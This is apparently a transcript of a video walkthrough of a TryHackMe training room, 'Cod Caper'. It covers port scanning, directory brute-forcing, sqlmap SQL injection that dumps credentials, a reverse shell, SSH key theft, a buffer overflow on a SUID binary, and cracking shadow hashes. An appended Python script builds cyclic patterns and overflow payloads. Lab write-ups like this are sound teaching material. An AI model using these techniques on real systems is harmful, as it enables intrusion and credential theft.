Hello everybody, this is John from the future. I'm doing a little quick edit at the beginning of this video so I can include this little announcement. I'm really excited about this; I hope you guys are as well. The past couple of days I've just spent some time building, creating, developing a TryHackMe room. So I'm very, very excited about this. I kind of have my own custom one out there. It is being released tomorrow, May 20th, or sometime around then. Hopefully you can keep an eye out for it and check it out. PeakHill is a new room that I'm very excited about. PeakHill, P-E-A-K-H-I-L-L. And I am pleased with it. It sounds like everyone that play tested it had a lot of fun. So I'm really looking forward to it. I hope you guys go check it out. And I'm so, so grateful for your support. Thanks so much. Hope you guys enjoy the video. Take care.

Hello everyone, my name is John Hammond and welcome back to another TryHackMe video. In this video, I want to be taking a look at the Cod Caper room. It is a free room, so you do not need to be subscribed to access it. It says it is a guided room taking you through infiltrating and exploiting a Linux system. So I have it deployed already. I'm joining this room and I've got a little IP address set up and created for me. The background on this, and this is a good guided one, explains: hello, my name is whatever that is, I've come here to put in a request to get my fish back. Exciting. Looks like he's banned from something, et cetera, et cetera, et cetera. It looks like we need some basic pen testing knowledge and we're not going to be going through every tool in detail. So let's just jump in. Okay, cool. We've read that. Let me move over and make a directory for the Cod Caper. Caper. And let's get a little readme going. Let's see. Where's my Sublime Text? Okay, so the cod caper, code caper, that's also cool. Okay. You know I can't type. I don't know why you guys even follow.
I don't know why you even watch this series, this YouTube channel. I don't know if you can hear that ambulance driving by, but that's totally getting in the way. Task one, no answer needed. Task two, I just like to have some documentation. Sorry, I know it's stupid.

Host enumeration. Looks like we want to go ahead and run Nmap. Okay, so I should probably start that up. Let's create an nmap directory. Let's go ahead and get that IP address in the scope for our terminal and let's fire that off: nmap initial on the IP address. Okay, I should be able to ping him just fine. I believe he's up already. Yep, okay, cool. So let's let that go. How many ports are open on the target machine? While that's scanning, let's just kind of throw these in our little write-up here. I like to do this even if it's just crappy, because hey, you might be able to just kind of throw this up on GitHub or Medium and be like, yo, this is my write-up of this thing that I did. And you can put in as much as you want to in this. I just like to slap in like Nmap scan results if it's in a separate file or any of those things, but I just like to have an extra copy of all of these answers when I go back to them. This does discuss a little bit of Nmap, showcasing some of the arguments and switches and parameters you can give to it. I think I've covered Nmap a lot in a lot of my different videos and I've used it all the time. So that -sC script that I always throw in will run default scripts on the port. The -A will go into aggressive mode; that will try and get as much information as possible. Anyway, let's go see what we've got here. Only two ports, it seems. Okay, so 22 and 80. There are two ports on that box. Let's go ahead and slap that in as our answer. What is the HTTP title of the web server? So with those default scripts, -sC, it did already track that down. It's just the Apache2 Ubuntu default page. So let's go ahead and copy that string and slap that in as the answer.
Again, we can keep note of that here. What's the version of the SSH server? OpenSSH, seemingly Ubuntu. Throw that guy in. I don't think we need the parenthetical. Okay, that looks like more of the format that TryHackMe needs. Did I throw that in the wrong spot? What is the version of the SSH service? Oh, oh, oh, oh, I totally missed a box here. You guys should have told me. You guys should have just screamed at your computer screen and obviously I would have heard it. Version of the web server. Do we have a version? Yes, we do. Okay, still output from Nmap. Slap that guy in. What format does that need to be in? Oh, oh, oh, it looks like that, as the Server header, is what it's asking for. Maybe? Yeah, okay, cool. I like that TryHackMe gives you those little asterisks and helps you showcase what you're really trying to submit.

So because we know that this is running Apache, or it has a web service on here, we can go ahead and kind of brute force directories or some files or content that might be available on that website. They actually give us a link here. So let's go ahead and download that for the word list that we will use to go ahead and pull down, or try and hammer the website to see if there are any actually interesting text files that might potentially be there, or PHP files or directories or anything that we'd like to look for. GoBuster is an awesome tool to do that in. So I'm going to go ahead and fire that up. I'll use gobuster with -u on http:// and the IP address. I'll use the word list of big and I'll supply some extensions here because they kind of suggested it: sh, txt, cgi, js, css, html, maybe some Python files, whatever we might happen to want to search for. See what we got. What is the name of the important file on the server? I don't know. Task three, just slapping these answers and questions in for good documentation. What is happening? What is going on? A lot of nonsense in here. Failing to parse some stuff. That is not what I expected. Okay.
Is it adding more to that? No, it is. Yeah, it definitely is. Maybe I don't need to look for all of those extensions. Maybe let's just look for php, txt and html. Quality content. I have no idea what that could be because that's a long, long file name, and obviously a three-letter one could be php, it could be txt. Let's go take a look at that web server though. Let's go see what this website actually has to be displayed on it for us. A default page. That's why we're running GoBuster. I'm a fool. What is going on, guys? What is all this? All right, let me pause this to figure this out.

Okay, so I realized the error and I realized kind of my mistake. I'll show you just kind of my troubleshooting process. I redirected the output, or the standard error, of GoBuster to /dev/null, and I'm just grepping for 200, so I would only be able to see things that would have a successful return. And then I was like, what is that big list actually returning for me? And I realized, oh, it is an HTML file. It is not a word list. So the fact that I used wget probably kind of borked that. So let's go ahead and redownload that and ideally that will work better now. Okay, it's not an actual text file. That's exactly why. Now that that's moved to Downloads, let's copy that over here. Let's move our Downloads big.txt into this guy. Is he still going? No, he's good. What do you mean it's not downloaded? Where'd you put him? Whatever. Oh, it put him in my home directory. Google Chrome, how could you do this to me? All right, so now let's fire that back up and hopefully that should work. Some learnings, some mistakes. I was trying to be nice and clever, but I was using a simple wget. That big.txt was misleading. I thought they were giving me a real text file, not a GitHub link. I guess I should have looked. Let's blame me. So what is the potentially interesting stuff in here? .htpasswd seems kind of peculiar. .htpasswd.txt might be useful. Oh, PHP, I probably won't be able to read.
Is .htaccess accessible? That one in here. How about .htaccess.php? Nope. Okay, I guess we're still gonna be waiting. Can I access those? Can we go see what those have? Let's go back to that website. Let's see what we got. There's our flat page. Let's check out .htaccess.txt. I'm not allowed to view those. I probably should have known that by looking at the status. We'll stand by. I'll keep waiting for GoBuster to finish that up. Okay, so now I see an administrator.php. That sounds like the right number of characters and is probably an interesting page. So let's try that guy. Looks good. All right, let's throw him in our notes here. And let's keep moving on.

Web exploitation. The admin page seems to give us a login form, and in situations like this it's always worthwhile to check for the low-hanging fruit. In the case of a login form, one of the first things to check for is SQL injection. So they actually showcase sqlmap here and they suggest using the -u argument to specify the URL, dumping stuff with --forms, or just grabbing everything from the database. So do I actually have sqlmap installed here? I don't think I've used it in a bit. sqlmap. Nope. All right, let's fire that up. It's probably not the best to take it from the repositories. It would be a much better idea to pull it from the GitHub repository. But I just kind of want to move through with some speed here because I think we've dawdled enough in this video. So, all right, cool. sqlmap. Why do I keep doing that? Now that you're in my path, great. Let's fire that up. The IP address is this guy. So let's fire that in. sqlmap -u, let's go take a look at that page first and see what it actually looks like, administrator.php. Okay, it just needs a login, but it's probably vulnerable to SQL injection. Let's try SQLite. Nope, let's try regular SQL. Try again. One equals one. Try again. Does that need to be in the path? Okay, let's just run our stinkin' sqlmap and try it up.
Let's use --forms and that needs to be on the administrator.php. Using --forms because there isn't an argument through GET that we're passing; this is all through POST. So we won't be using anything after like a question mark, var equals value, in here. It's going to be determining it from the form on the page here because it's a POST method. Go. Yep, test that form. Do it, do it. Fill it with random data, figure it out. Looks like the backend database is MySQL. Do you want to skip payloads? My face is in the way. Yeah, we want to skip payloads. We don't need to do that stuff. Yes, go ahead and continue with all of the tests. sqlmap likes to be very inquisitive. It's very, very curious. Let's see if that gets any results for us. Okay, sqlmap seemed to find some things where it's thinking a POST parameter is injectable, but it's asking, do you want to try with random characters rather than null values? And I say, yes, that's totally fine. Just keep beating it up. And maybe you'll track down a potential injection. Great, now it figured out that the username variable is vulnerable and we can inject into it. Do you want to test any others? I'm going to say no here, and do you want to exploit this SQL injection? I'm going to say yes. And now we have that kind of payload saved in cache so sqlmap can use it later. I do want to specify the --a, because that will dump everything from the database, as it said. Not --, just a regular hyphen, just a single -a, grabs just about everything from the database. Let's grab it all. Let's see what you can get. You will probably need to go select and enter everything that I already found. Test parameters don't need to be injectable. Well, you already found this. You already figured this out. I hate doing this because when I use --forms it doesn't particularly have an idea what I'm referring to. Let's just try and use --data. Is that a thing? Let's check out the man page for sqlmap.
Data: string data to be sent through POST. So I'll use --data and username= so we can supply that field. I'm gonna use an ampersand here and password=. Because I'm using that ampersand, Bash might interpret that as me trying to background a job, so I'm gonna use single quotes here, and let's see if that gets the exploit in okay. So now I can use -a and start to leak out everything. So that -a, as was suggested in the text here, will retrieve some passwords. Do you wanna store hashes to a temporary file for eventual further processing with the database tools? Yeah, that's fine. Go ahead and perform a dictionary-based attack on those password hashes. Feel free to do it with the default dictionary. No, we don't need to use password suffixes. Let's see if it tracks anything down. So maybe this is a hash for root. Oh, looks like it cracked some passwords here. Okay, root's password is simply root and maybe that will work. Maybe that is the answer. Okay, so it's dumping out all the privileges. Wow, there's a lot of stuff in here. I've never actually used -a for sqlmap. Man, that's kind of cool. Is this the password? Oh, it's not just straight root. We need to know the admin password. How many forms of SQL injection is the form vulnerable to? We found three: the time-based, the error-based, or, the injections: time-based injection, error-based injection and blind injection. It's retrieving a lot of stuff. I don't know if I want all of those. Can we just dump the database's name? Or maybe it is, maybe that's really helpful. I'll just leave it on and we'll pause. You know what? That is taking a long, long time and it's getting some useless things that I don't care about. So I am gonna break that and let's just use --dbs to leak out the databases: information_schema. Okay, it already found some of these. So let's just use --D users and then, oh, sorry, -D users and then --tables to dump out the tables. There we go. So users, okay.
Now I can specify -T for users and let's dump that out. Username, password, there we go. Okay, so the username is pingudad and the password is secretpass. So let's slap that in: pingudad, pingudad. Wow. All right, I'm going to steal that syntax and just kind of slap it in here for our notes. I'll actually also keep track of that command. I'll copy and paste that guy. There we go. And I guess I won't bother filling those in.

Let's do some command execution. It seems we've gained the ability to run commands. Since this is my old PC, I should still have a user account; run a few test commands and try and get access. It probably just was going to allow us some communication on, like, some ability to actually run commands on the admin panel. Now that we have login credentials, we could probably do that. That's totally fine. Okay, so if we wanted to run commands, we could just run ls and kind of see some things around here, but we could try and get a shell. So what I'm going to do is I'm actually just going to fire up Guake and use my poor man's pentest, because it looks like if we have Netcat on the box, we could slap in a Netcat reverse shell and then go ahead and get that connectivity. So now that that is accessible for us, let's try and see if we have Python: python -c 'import pty; pty.spawn', whoops, I suck at typing. That works. Let's go ahead and stabilize this shell. And now we should have a usable utility. Okay. What is it asking for following this? How many files are in the current directory? We saw three here. Do I still have an account? Let's cat out /etc/passwd and see. pingu. He exists. So let's say yes. I'm assuming that's it because it's three letters. Yep, that's fine. What is my SSH password? Well, let's go into /home and he has a home directory. So let's go check that out. Is there anything in here? There is nano. That's a directory. He also has .ssh in here. What is the SSH password?
Would it be... he doesn't have any bash history, GDB history, which is kind of interesting. Maybe he has something in nano. ls -la, nothing in here. So no history in that. Well, we could go ahead and get his SSH key. Maybe that has a password set on it. Maybe that's what it's referring to. Let's cat out that id_rsa key. So we have his private key and let's go ahead and create a directory to actually interact with that. That put me in my CAUTH directory because that is where Guake tends to live. So let's say pingu.id_rsa, slap that in, make that something that SSH is willing to use. And let's actually grab our IP address because I'm in a new shell. So I can ssh -i that guy, pingu at the IP address. Log me in, please. Yep, that's totally fine. And he needs a password. That's not secretpass again, is it? Could we brute force that with Hydra? What am I missing? Why do I not see his password? Well, if I go back and read the prompt here: assuming my father hasn't modified my old PC, I should still have my hidden password source somewhere. We don't know where it is, so we could find it with find: search for files that a specific user owns. So let's go to the root directory and let's do find / -user pingu. And let's force all of that bad noise to /dev/null. And let's see if he has any files that he owns. That might take a little bit of time to come through. .cache, is that it? Nope. It'd be weird to see it in GDB history. Whatever, let's just friggin' get LinPEAS in here because I'm not seeing it in that. Now that we have LinPEAS, let's mark that as executable, run it and tee that to linlog so we have some saved output. And let's look for some interesting things. So the MySQL database is in there. papa, that's the other user. Those are all the MySQL strings we were able to determine already. Natural rsync, private SSH key, yep, we've got that. But we need to know his password. Maybe there is some stuff that papa owns that is interesting.
Oh, /var/backups/shadow.bak. Let's take a look at what that guy is. I can't read that, okay? Okay, after a good while of looking around, I think I found it. I ended up finding it manually in the /var directory, with a little folder named hidden, and there is a pass file there and it is pingu pingu. So that is the password. There we go. I guess I had not found that because it is not owned by pingu. It is owned by the www-data user, which, I guess, maybe I'm just stupid. Maybe I just didn't think of that. But obviously if we were to go run our find command again, and I tried to add some other arguments like, hey, why can't I find this? Apparently the user is not pingu. It is www-data. So let me try this guy. There we go. Interesting. Okay, that's that.

Now we could totally SSH into that machine. So let's ssh -i that pingu id_rsa to that pingu user on the IP address, and checking that password again, just to jump in here. There we go. Now we are logged in via SSH. So it's telling me to go ahead and do some LinEnum. I would do the same with LinPEAS. So that should still be executable. We can go ahead and run it one more time. It's apparently looking for interesting SUID binaries. Maybe I had not found it or it just didn't look for it due to checking passwords, or there might be some peculiar ones in here. SUID: newgrp, chfn. Looks like it has an interesting path with a long name in the middle. secret/root, that one that I found earlier. I don't know why I missed that. Let me go ahead and add some more time to this because it has taken me way too long to go track through this. /opt/secret/root is what we're looking for. Good. Looks like this is a binary. Can I go check that out? Can I hop over there? ls -la, file root. I can execute it. It is a binary. Able to grab the source code from my dad's flash drive.
It has a shell function, interestingly enough, that will go ahead and cat out the /var/backups/shadow.bak, which looks like a backup of /etc/shadow, and it will read an input. Okay, so this looks like a classic buffer overflow. So it's going through, in the TryHackMe walkthrough, explaining this is what you could do with pwndbg or some added plugins for GDB. I've showcased a couple of command-line Linux buffer overflow things before. So what I'll end up doing is actually just using readelf to go ahead and determine the address of that shell function and then doing kind of their trick to exploit it manually, using Python to print all that out. It looks like they have Python 2 in here, so that should be accessible; if we were to do it with Python 3, let me check if Python 3 is in here. It is. Okay, great. So I'll use Python 3 in that case. Hopefully get that right. Do we have readelf? We do. So let's go ahead and readelf the symbols on that binary here, and the shell function has this address. So if we were to use cyclic, which I don't know if we have. Okay, we do because it gave us pwntools in here. Nice. Go and check for some versions of pwntools, which, this machine probably doesn't have internet, so that won't work. We totally don't have Metasploit, but we can go ahead and use pwn cyclic on our own machine. So let's get cyclic 50 and let's throw that at the binary. I'm not in the www shell. I guess I don't need it anymore. So let's echo -ne that cyclic pattern into root and see where it crashes. We get a segmentation fault. I'm gonna run dmesg to go see where that's at, and then I'll go ahead and cyclic, I think it's -l to look up, and I think it needs a 0x in here, or maybe it doesn't. Okay, subpattern must be four bytes. So it totally does. Maybe it's -q or -p -l. Hello. Oh, that might be whining because it's doing some Python 3 things and maybe that is specific to Python 2. Okay.
So now if I use that lookup and I'll use 0x here, 44 is the offset, which is good because that matches kind of what the TryHackMe room was walking us through. So we know, from our readelf -s on root, the shell function. Oh, grep shell. So that is the address that we need. So with Python 2, let's go ahead and print out nonsense 44 times to get to the offset where we can go ahead and grab the instruction pointer, and now let's import struct at the beginning of that. So we can struct.pack and make that into some bytes we could supply; use 0x to include that. I'll close that and that. So now we have the raw bytes and we'll go ahead and pass that to the root binary, which will cat out the backup file for us. There we go.

We could do that with pwntools just as easily, and that's the next section that they discuss. They actually offer the script here where they're doing that. They use pwntools to create a process, grab the ELF file so it has the binary, and search for the actual address of the shell function, and they do a really cool technique. I actually haven't seen that fit function before, where it'll fit 44 characters and then grab the shell function right after it. So that's kind of neat, and then it just sends it along and makes it interactive. So same sort of technique, same thing, just some Python pwntools access, and there we go. Mark that as complete, and now we need to go ahead and crack that hash. So they're using hashcat. I think I'm just gonna go ahead and use John. There we have papa here as his string. So I'll go back to my host and I'll just say subl shadow. I'll paste that guy in and I'll use the John the Ripper in /opt: run john --wordlist=/opt/rockyou.txt and I'll run it on that shadow file. Okay. Now I found the password there. It is postman. So back to our shell. We could su to papa, enter postman as our password. Now we are papa and submit postman here. What, what, oh, what is the root password? I'm sorry. That's not papa.
What can papa run? Can he escalate our privileges? Nope, we can't sudo. Well, what else could we potentially do then? Maybe in that output we actually had a root password. Could we crack that? Let's include that guy here, run that one more time and let's see if John the Ripper could crack that. I guess I'll go ahead and go check out if there are any routes for privilege escalation with the papa user while that's going. And okay, actually John the Ripper was able to go ahead and crack that root password. So that answer is love to fish. There we go. Now we could just go ahead and switch user into root, use his password here. And is there anything in the root directory? Nope, so no root flag to go into. Looks like that's just a simple thank you, and it says, great, we completed the room. So okay, that was that.

Wow, that took a little bit of time. I was fumbling a lot on that one. I hope you guys enjoyed. That was kind of cool to get a little bit of binary exploitation, or at least just a simple classic buffer overflow. And they do a really good job of showcasing the different ways to go about this. pwndbg is kind of cool, giving you the source code to kind of understand where that vulnerability comes from and being able to go determine, okay, what's the address and where can we track down all of that information to build that buffer overflow in that classic exploit. Okay, that's that. That's all I wanted to cover. Thank you guys so much for watching. If you did like this video, please do hit that like button, comment, do the YouTube algorithm stuff. Please subscribe. I'd love to see you guys. Love to see you in the Discord server. Love to see you on Patreon, PayPal, LinkedIn, Facebook, Twitter, Instagram, all those other things. Thank you. Bye.
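As an added example (not code from the video or from the TryHackMe room's own pwntools script), here is a small Python 3 reimplementation of the offset-finding steps the walkthrough runs by hand: generate a pwntools-style cyclic pattern (`cyclic 50`), look up the 4-byte value that ended up in the instruction pointer after the crash (the `cyclic -l` step, including its "subpattern must be four bytes" complaint), and pack offset plus return address with `struct`. The crash value and the `shell` address in the demo are constructed placeholders; the real address comes from `readelf -s root | grep shell` on the target binary.

```python
"""Offset finding for a classic 32-bit stack overflow, the way the room
walks through it: cyclic pattern -> crash value from dmesg -> offset -> payload."""
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase  # default alphabet of pwntools' cyclic
SUBPATTERN = 4                     # 32-bit target: every 4-byte window is unique


def de_bruijn(alphabet=ALPHABET, n=SUBPATTERN):
    """Lazily yield a de Bruijn sequence B(k, n) over `alphabet`. This is the
    same construction pwnlib.util.cyclic uses, so offsets agree with `cyclic -l`."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """The `cyclic 50` step: the first `length` bytes of the pattern."""
    return "".join(itertools.islice(de_bruijn(), length)).encode()


def cyclic_find(needle, max_len=4096):
    """The `cyclic -l` step. `needle` is the value that landed in EIP, either
    as an int read from dmesg (e.g. 0x6161616c) or as the raw 4 bytes.
    Returns the offset into the pattern, or -1 if the value is not part of it."""
    if isinstance(needle, int):
        needle = struct.pack("<I", needle)  # little-endian, as the CPU stored it
    if len(needle) != SUBPATTERN:
        raise ValueError("subpattern must be %d bytes" % SUBPATTERN)
    return cyclic(max_len).find(needle)


def build_payload(offset, ret_addr):
    """Pad up to the saved return address, then overwrite it with `ret_addr`
    packed as a little-endian 32-bit value (the struct.pack step in the video)."""
    return b"A" * offset + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    crash_eip = 0x6161616c    # constructed: what dmesg shows after feeding cyclic(50)
    offset = cyclic_find(crash_eip)
    shell_addr = 0x08048000   # placeholder: take the real one from `readelf -s root | grep shell`
    payload = build_payload(offset, shell_addr)
    print("pattern:", cyclic(50).decode())
    print("offset :", offset)
    print("payload:", payload.hex())
```

Feeding `payload` to the binary is the same `echo -ne` step from the video; the script only builds the bytes.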